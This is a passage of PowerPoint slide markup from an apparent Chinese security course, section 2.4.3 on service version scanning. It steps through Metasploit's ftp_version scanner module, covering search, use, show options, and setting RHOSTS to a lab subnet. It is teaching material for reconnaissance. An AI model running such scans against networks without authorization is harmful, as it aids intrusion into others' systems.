                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.使用“search”命令可以查找Metasploit工具中模块的路径，使用“search ftp_version”命令找出ftp_version模块的使用路径，这个模块能够扫描FTP服务的版本，如图2-4-12所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5567680" y="2004060"/>
            <a:ext cx="5276850" cy="1085850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="文本框 101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5567680" y="3089910"/>
            <a:ext cx="5080000" cy="1753235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-12 查找ftp_version模块的使用路径</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0"/>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3.输入“use”命令和新搜索到的模块路径“auxiliary/scanner/ftp/ftp_version”，以使用ftp _version扫描模块，如图2-4-13所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5567680" y="4843145"/>
            <a:ext cx="3857625" cy="600075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="文本框 102"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5567680" y="5443220"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-13 使用ftp_version扫描模块</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="3795395" cy="854076"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="3795395" cy="854561"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3129915" cy="522267"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用 Metasploit工具进行FTP服务版本扫描</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤一</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="矩形 23"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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25" name="矩形 24"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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26" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.3 服务版本扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="103" name="文本框 102"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5318125" y="369253"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>4.使用“show options”命令查看当前模块需要设置的参数，如图2-4-14所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5318125" y="1014413"/>
            <a:ext cx="5276850" cy="1647825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="文本框 103"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4536440" y="2662555"/>
            <a:ext cx="7296150" cy="2584450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>                         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-14  查看当前模块需要设置的参数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>从执行的结果可以看到，ftp_version模块有5个参数，分别是FTPPASS (FTP密码)、FTPUSER（FTP用户)、RHOSTS（目标主机地址)、RPORT (目标主机端口)、THREADS(线程数)，“Required”栏中是“yes”的表示这是必需要设置的参数，“no”表示这个参数可以设置也可以不设置，在“Current Setting”栏中可以看到有4个参数已经设置好了，还需要设置RHOSTS（目标主机地址）参数，使用“set RHOSTS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>192.168.172</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>.0/24”命令设置目标地址为当前网段，如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2-4-15</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5318125" y="5162233"/>
            <a:ext cx="5276850" cy="638175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="文本框 104"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5318125" y="5834063"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-15 设置参数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="3795395" cy="854076"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="3795395" cy="854561"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3129915" cy="522267"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用 Metasploit工具进行FTP服务版本扫描</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤一</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
